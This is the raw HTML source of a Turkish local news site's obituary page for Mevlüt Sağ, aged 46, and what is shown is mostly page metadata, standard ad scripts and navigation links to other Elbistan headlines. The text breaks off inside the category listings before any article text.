
<!DOCTYPE html> <html lang="tr" class="no-inlinesvgsite-center" itemscope itemtype="http://schema.org/NewsArticle"> <head> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7914883170465839", enable_page_level_ads: true }); </script> <title>Mevlüt Sağ 46 yaşında</title> <meta charset="utf-8"> <!--meta name="viewport" content="width=device-width, initial-scale=1.0"--> <meta name="description" content=""> <meta name="keywords" content="Mevlüt Sağ 46 yaşında"> <meta name="news_keywords" content="Mevlüt Sağ 46 yaşında"> <meta name="author" content="Elbistanın Sesi" /> <meta property="fb:admins" content=""> <meta property="og:site_name" content="Elbistanın Sesi"> <meta property="og:title" content="Mevlüt Sağ 46 yaşında"> <meta property="og:description" content=""> <meta property="og:url" content="http://www.elbistaninsesi.com/vefatlar/mevlut-sag-46-yasinda-h68090.html"> <meta property="og:image" content="http://www.elbistaninsesi.com/images/haberler/2020/10/mevlut_sag_46_yasinda_h68090_ef5c0.jpg"> <meta property="og:type" content="article"> <meta http-equiv="refresh" content="3000"> <meta name="twitter:card" content="summary_large_image"> <meta name="og:title" content="Mevlüt Sağ 46 yaşında"> <meta name="twitter:url" content="http://www.elbistaninsesi.com/vefatlar/mevlut-sag-46-yasinda-h68090.html"> <meta name="twitter:domain" content="http://www.elbistaninsesi.com/"> <meta name="twitter:site" content="elbistaninsesi"> <meta name="twitter:title" content="Mevlüt Sağ 46 yaşında"> <meta name="twitter:description" content=""> <meta name="twitter:image:src" content="http://www.elbistaninsesi.com/images/haberler/2020/10/mevlut_sag_46_yasinda_h68090_ef5c0.jpg"> <link rel="alternate" href="http://www.elbistaninsesi.com/" hreflang="tr-default" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet" /> <link href="http://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print, handheld"> <link rel="alternate" type="application/rss+xml" title="RSS servisi" href="http://www.elbistaninsesi.com/rss.php" /> <link href="https://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext" rel='stylesheet' type='text/css'> <link href="https://fonts.googleapis.com/css?family=PT+Sans:400,700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link href="https://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext" rel='stylesheet' type='text/css'> <link href="https://fonts.googleapis.com/css?family=Roboto+Slab:700&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css"> <link rel="canonical" href=""> <link rel="publisher" href="#" /> <link rel="image_src" type="image/jpeg" href="http://www.elbistaninsesi.com/images/haberler/2020/10/mevlut_sag_46_yasinda_h68090_ef5c0.jpg" /> <meta itemprop="headline" content="Mevlüt Sağ 46 yaşında" /> <meta itemprop="thumbnailUrl" content="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/10/mevlut_sag_46_yasinda_h68090_ef5c0.jpg" /> <meta itemprop="articleSection" content="Vefatlar" name="section" /> <meta itemprop="dateCreated" content="2020-10-17T06:20:49+02:00" /> <meta itemprop="image" content="http://www.elbistaninsesi.com/images/haberler/2020/10/mevlut_sag_46_yasinda_h68090_ef5c0.jpg" /> <meta itemprop="genre" content="news" name="medium" /> <meta itemprop="inLanguage" content="tr-TR" /> <meta itemprop="keywords" content="Mevlüt Sağ 46 yaşında" name="keywords" /> <!--[if gte IE 9]> <style type="text/css"> .gradient { filter: none; } </style> <![endif]--> <!--[if IE 7]> <style type="text/css"> .reklam.dikey.sol .fixed { margin-left:-px; } </style> <![endif]--> <script type="text/javascript"> var site_url = 'http://www.elbistaninsesi.com/'; var tema = 'hs-rush-php'; var theme_path = 'http://www.elbistaninsesi.com/_themes/hs-rush-php/'; var ajax_url = '_ajax/'; var cat_limit = '10'; var headerayar = 'header_genis'; var poll_voted = ''; var comment_approved = '0'; var doviz = '1'; var lazyload = '0'; var twitter_user = 'elbistaninsesi'; var facebook_user = 'elbistaninsesi'; var popup_saat = '1'; var yorum_harf_ayar = '1'; var hava = '0'; var hava_default = '15888'; var namaz = '1'; var iftara_kalan_sure = '0'; var namaz_default = 'kahramanmaras'; var superlig = '1'; var uye_gir = 'Üye Girişi'; var uye_ol = 'Üye Ol'; var cikis_yap = 'Çıkış Yap'; var baglan_fb = 'Facebook ile Bağlan'; var analitik_ga = 'UA-21655627-1'; </script> <script data-ad-client="pub-3633419220222736" async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!--[if lt IE 9]> <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script> <![endif]--> <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <script> (adsbygoogle = window.adsbygoogle || []).push({ google_ad_client: "ca-pub-7533583759274488", enable_page_level_ads: true }); </script> </head> <body> <!-- HEADER --> <div id="siteHeader" class="header fluid row-fluid"> <div id="header-top" class="header-top row-fluid"> <div class="header-top-container"> <div class="header-top-block header-top-cycle"> <div class="header-top-currency"> <div class="currency-cycle"> <div class="currency-dolar glyphicons white usd">DOLAR <span class="currency-rate">7.8735</span></div> <div class="currency-euro glyphicons white euro">EURO <span class="currency-rate">9.2279</span></div> <div class="currency-altin glyphicons white coins">ALTIN <span class="currency-rate">484.547</span></div> <div class="currency-bist glyphicons white global">BIST <span class="currency-rate">1193</span></div> </div> </div> <div class="header-top-hot mleft"> <div class="hot-cycle"> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/koronavirus-ilkokul-ogretmenini-hayattan-kopardi-h68089.html" title="Koronavirüs, ilkokul öğretmenini hayattan kopardı" >Koronavirüs, ilkokul öğretmenini hayattan kopardı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-salgindan-kurtulmanin-yontemi-maske-mesafe-ve-hijyen-h68088.html" title="Kaymakam Demir: “Salgından kurtulmanın yöntemi maske, mesafe ve hijyen”" >Kaymakam Demir: “Salgından kurtulmanın yöntemi maske, mesafe ve hijyen”</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/tarsim-kuraklik-sigortasi-odemelerine-basladi-h68087.html" title="TARSİM, kuraklık sigortası ödemelerine başladı" >TARSİM, kuraklık sigortası ödemelerine başladı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/hemde-okuma-yazma-kursu-acildi-h68086.html" title="HEM’de okuma yazma kursu açıldı" >HEM’de okuma yazma kursu açıldı</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/7-mahalleyi-ilceye-baglayan-yol-asfaltlaniyor-h68085.html" title="7 mahalleyi ilçeye bağlayan yol asfaltlanıyor" >7 mahalleyi ilçeye bağlayan yol asfaltlanıyor</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/9-gundur-kayipti-ormanlik-alanda-cansiz-bedeni-bulundu-h68081.html" title="9 gündür kayıptı, ormanlık alanda cansız bedeni bulundu" >9 gündür kayıptı, ormanlık alanda cansız bedeni bulundu</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/elbistanda-tarihe-isik-tutan-kiz-kalesi-turizme-kazandirilacak-h68079.html" title="Elbistan’da tarihe ışık tutan Kız Kalesi, turizme kazandırılacak" >Elbistan’da tarihe ışık tutan Kız Kalesi, turizme kazandırılacak</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/minibusun-carptigi-yasli-adam-hayatini-kaybetti-h68078.html" title="Minibüsün çarptığı yaşlı adam hayatını kaybetti" >Minibüsün çarptığı yaşlı adam hayatını kaybetti</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-yuz-yuze-egitime-baslayan-ogrencileri-ziyaret-etti-h68077.html" title="Kaymakam Demir, yüz yüze eğitime başlayan öğrencileri ziyaret etti" >Kaymakam Demir, yüz yüze eğitime başlayan öğrencileri ziyaret etti</a> </div> <div> <a class="glyphicons white history rotateIn" href="http://www.elbistaninsesi.com/guncel/muhtar-cinayetinin-sanigina-18-yil-hapis-h68076.html" title="Muhtar cinayetinin sanığına 18 yıl hapis" >Muhtar cinayetinin sanığına 18 yıl hapis</a> </div> </div> </div> </div> <div class="header-top-block header-top-right"> <div class="header-top-user"> <div class="btn-group"> <button class="btn btn-user dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button> <ul id="memberArea" class="dropdown-menu"> </ul> </div> </div> </div> <div id="sb-search" class="header-top-block header-top-search sb-search"> <form action="http://www.elbistaninsesi.com/" method="get"> <input type="hidden" name="m" value="arama"> <input class="sb-search-input" placeholder="Haber Ara ..." type="search" name="q" id="search"> <input type="hidden" name="auth" value="a35fe593baa02917a87d73b1454ccb562e902238" /> <input class="sb-search-submit" type="submit" value=""> <span class="sb-icon-search"></span> </form> </div> </div> </div> <div id="logo" class="row-fluid"> <div class="container"> <div class="span3"> <span class="logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="Mevlüt Sağ 46 yaşında" /></a></span> </div> </div> </div> <div id="menu" class="row-fluid"> <div class="kategori"> <div class="container"> <a href="http://www.elbistaninsesi.com/" class="darken glyphicons home"></a> <a href="http://www.elbistaninsesi.com/yazarlar.html" class="blue glyphicons group">Yazarlar</a> <a title="Vefatlar" href="http://www.elbistaninsesi.com/vefatlar" id="k7" class="current" >Vefatlar</a> <a title="Güncel" href="http://www.elbistaninsesi.com/guncel" id="k8" >Güncel</a> <a title="Politika" href="http://www.elbistaninsesi.com/politika" id="k2" >Politika</a> <a title="Sağlık" href="http://www.elbistaninsesi.com/saglik" id="k4" >Sağlık</a> <a title="Eğitim / Kültür" href="http://www.elbistaninsesi.com/egitim-kultur" id="k5" >Eğitim / Kültür</a> <a title="Spor" href="http://www.elbistaninsesi.com/spor" id="k1" >Spor</a> <a title="Ekonomi" href="http://www.elbistaninsesi.com/ekonomi" id="k3" >Ekonomi</a> <a title="Arşiv Özel" href="http://www.elbistaninsesi.com/arsiv-ozel" id="k9" >Arşiv Özel</a> <a title="Seçim Sonucu" href="http://www.elbistaninsesi.com/secim-sonucu" id="k13" >Seçim Sonucu</a> <a title="YEREL" href="http://www.elbistaninsesi.com/yerel" id="k17" >YEREL</a> <div class="other pull-right"><a href="#" class="all" title="Diğer Kategoriler">TÜM KATEGORİLER</a></div> <div class="othercat"> <div class="inner"> <div class="clearfix"> <a title="ASAYİŞ" href="http://www.elbistaninsesi.com/asayis" id="k19" >ASAYİŞ</a> <a title="KÜLTÜR-SANAT" href="http://www.elbistaninsesi.com/kultur-sanat" id="k20" >KÜLTÜR-SANAT</a> <a title="GENEL" href="http://www.elbistaninsesi.com/genel" id="k21" >GENEL</a> <a title="DÜNYA" href="http://www.elbistaninsesi.com/dunya" id="k22" >DÜNYA</a> <a title="EĞİTİM" href="http://www.elbistaninsesi.com/egitim" id="k48" >EĞİTİM</a> <a title="ÇEVRE" href="http://www.elbistaninsesi.com/cevre" id="k53" >ÇEVRE</a> <a title="MAGAZİN" href="http://www.elbistaninsesi.com/magazin" id="k60" >MAGAZİN</a> <a title="HABERDE İNSAN" href="http://www.elbistaninsesi.com/haberde-insan" id="k71" >HABERDE İNSAN</a> </div> </div> </div> </div> </div> <div id="katicerik" class="row-fluid"> <div class="container"><div class="katelement kat_k7"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/soner-kaba-25-yasinda-h68091.html" title="Soner Kaba 25 yaşında,"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/10/soner_kaba_25_yasinda_h68091_4544c.jpg" alt="Soner Kaba 25 yaşında," /> Soner Kaba 25 yaşında,</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/mevlut-sag-46-yasinda-h68090.html" title="Mevlüt Sağ 46 yaşında"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/10/mevlut_sag_46_yasinda_h68090_ef5c0.jpg" alt="Mevlüt Sağ 46 yaşında" /> Mevlüt Sağ 46 yaşında</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/hasan-karatas-82-yasinda-h68083.html" title="Hasan Karataş 82 yaşında,"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/10/hasan_karatas_82_yasinda_h68083_f8899.jpg" alt="Hasan Karataş 82 yaşında," /> Hasan Karataş 82 yaşında,</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/vefatlar/elif-kuyucu-75-yasinda-h68082.html" title="Elif Kuyucu 75 yaşında,"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/10/elif_kuyucu_75_yasinda_h68082_b8fff.jpg" alt="Elif Kuyucu 75 yaşında," /> Elif Kuyucu 75 yaşında,</a> </div> </div></div><div class="katelement kat_k8"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/koronavirus-ilkokul-ogretmenini-hayattan-kopardi-h68089.html" title="Koronavirüs, ilkokul öğretmenini hayattan kopardı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/10/koronavirus_ilkokul_ogretmenini_hayattan_kopardi_h68089_2b6f7.jpg" alt="Koronavirüs, ilkokul öğretmenini hayattan kopardı" /> Koronavirüs, ilkokul öğretmenini hayattan kopardı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-salgindan-kurtulmanin-yontemi-maske-mesafe-ve-hijyen-h68088.html" title="Kaymakam Demir: “Salgından kurtulmanın yöntemi maske, mesafe ve hijyen”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/10/kaymakam_demir_salgindan_kurtulmanin_yontemi_maske_mesafe_ve_hijyen_h68088_90529.jpg" alt="Kaymakam Demir: “Salgından kurtulmanın yöntemi maske, mesafe ve hijyen”" /> Kaymakam Demir: “Salgından kurtulmanın yöntemi maske, mesafe ve hijyen”</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/tarsim-kuraklik-sigortasi-odemelerine-basladi-h68087.html" title="TARSİM, kuraklık sigortası ödemelerine başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/10/tarsim_kuraklik_sigortasi_odemelerine_basladi_h68087_be2bf.jpg" alt="TARSİM, kuraklık sigortası ödemelerine başladı" /> TARSİM, kuraklık sigortası ödemelerine başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/guncel/hemde-okuma-yazma-kursu-acildi-h68086.html" title="HEM’de okuma yazma kursu açıldı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/10/hemde_okuma_yazma_kursu_acildi_h68086_a4748.jpg" alt="HEM’de okuma yazma kursu açıldı" /> HEM’de okuma yazma kursu açıldı</a> </div> </div></div><div class="katelement kat_k2"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/iyi-partide-mevcut-baskan-huseyin-gul-guven-tazeledi-h66989.html" title="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/06/iyi_partide_mevcut_baskan_huseyin_gul_guven_tazeledi_h66989_4ef72.JPG" alt="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi" /> İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/ak-parti-ilce-baskan-adayi-tirastan-aciklama-h66803.html" title="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/05/ak_parti_ilce_baskan_adayi_tirastan_aciklama_h66803_4a4d1.jpg" alt="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama" /> AK Parti İlçe Başkan Adayı Tıraş’tan açıklama</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/baskan-sungur-kongrede-yeniden-aday-olmayacagini-acikladi-h65800.html" title="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/baskan_sungur_kongrede_yeniden_aday_olmayacagini_acikladi_h65800_70585.jpeg" alt="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı" /> Başkan Sungur kongrede yeniden aday olmayacağını açıkladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" /> MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a> </div> </div></div><div class="katelement kat_k4"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/crown-dental-hasta-kabulune-basladi-h63790.html" title="Crown Dental hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/crown_dental_hasta_kabulune_basladi_h63790_f7c46.JPG" alt="Crown Dental hasta kabulüne başladı" /> Crown Dental hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/uzman-dr-erdinc-hatipsoylu-hasta-kabulune-basladi-h63781.html" title="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/uzman_dr_erdinc_hatipsoylu_hasta_kabulune_basladi_h63781_4e39a.JPG" alt="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı" /> Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/elbistanda-saglik-kadrosu-guclenmeye-devam-ediyor-h63436.html" title="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_saglik_kadrosu_guclenmeye_devam_ediyor_h63436_480cd.JPG" alt="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor" /> Elbistan’da sağlık kadrosu güçlenmeye devam ediyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/saglik/edh-obezite-cerrahisinde-soz-sahibi-olmaya-basladi-h63423.html" title="EDH, obezite cerrahisinde söz sahibi olmaya başladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/edh_obezite_cerrahisinde_soz_sahibi_olmaya_basladi_h63423_4b617.JPG" alt="EDH, obezite cerrahisinde söz sahibi olmaya başladı" /> EDH, obezite cerrahisinde söz sahibi olmaya başladı</a> </div> </div></div><div class="katelement kat_k5"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/maras-savunmasi-belgeselinin-elbistan-bolumu-cekiliyor-h63426.html" title="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/maras_savunmasi_belgeselinin_elbistan_bolumu_cekiliyor_h63426_dfbd4.JPG" alt="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor" /> Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" /> Otizmli çocuklar için özel etkinlik</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" /> Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" /> Nurhak Kaymakamlığı’ndan eğitime özel destek</a> </div> </div></div><div class="katelement kat_k1"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistanspor-kadin-voleybol-takimi-ankaradan-puansiz-dondu-h65794.html" title="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/elbistanspor_kadin_voleybol_takimi_ankaradan_puansiz_dondu_h65794_499a5.jpg" alt="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü" /> Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/filenin-sultanlari-nevsehiri-agirlayacak-h65558.html" title="Filenin sultanları, Nevşehir’i ağırlayacak"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/filenin_sultanlari_nevsehiri_agirlayacak_h65558_a6a90.jpg" alt="Filenin sultanları, Nevşehir’i ağırlayacak" /> Filenin sultanları, Nevşehir’i ağırlayacak</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/ptt-sporu-3-1-yenen-filenin-sultanlari-moral-buldu-h65460.html" title="PTT Spor’u 3-1 yenen filenin sultanları moral buldu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ptt_sporu_3_1_yenen_filenin_sultanlari_moral_buldu_h65460_2da74.jpg" alt="PTT Spor’u 3-1 yenen filenin sultanları moral buldu" /> PTT Spor’u 3-1 yenen filenin sultanları moral buldu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/spor/elbistan-in-sultanlari-ndan-onemli-galibiyet-h65021.html" title="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/elbistan_in_sultanlari_dan_onemli_galibiyet_h65021_ff6ef.jpg" alt="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet" /> Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet</a> </div> </div></div><div class="katelement kat_k3"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/mikrokredi-destegi-koronavirus-doneminde-de-devam-ediyor-h67098.html" title="Mikrokredi desteği koronavirüs döneminde de devam ediyor"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/mikrokredi_destegi_koronavirus_doneminde_de_devam_ediyor_h67098_5fc86.jpg" alt="Mikrokredi desteği koronavirüs döneminde de devam ediyor" /> Mikrokredi desteği koronavirüs döneminde de devam ediyor</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html" title="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/baris_pinari_harekatinda_teror_orgutune_buyuk_darbe_h64435_aec94.jpg" alt="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" /> Barış Pınarı Harekatı’nda terör örgütüne büyük darbe</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" /> ETSO ve TEB kredi protokolü imzaladı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" /> DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a> </div> </div></div><div class="katelement kat_k9"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" /> 17 EKİM 1968 PAZARTESİ</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" /> 13 EKİM 1968 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" /> 17 AĞUSTOS 1967 PERŞEMBE</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" /> 30 MAYIS 1959 CUMARTESİ</a> </div> </div></div><div class="katelement kat_k13"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" /> 16 Nisan 2017 Anayasa Değişikliği Referandumu</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" /> 1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" /> 7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a> </div> </div><div class="kathab"></div></div><div class="katelement kat_k17"> <div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" /> KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek" /> Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" /> Öğrenciler hedefi 12’den vurmak için yarıştı</a> </div> </div><div class="kathab"><div> <a href="http://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img 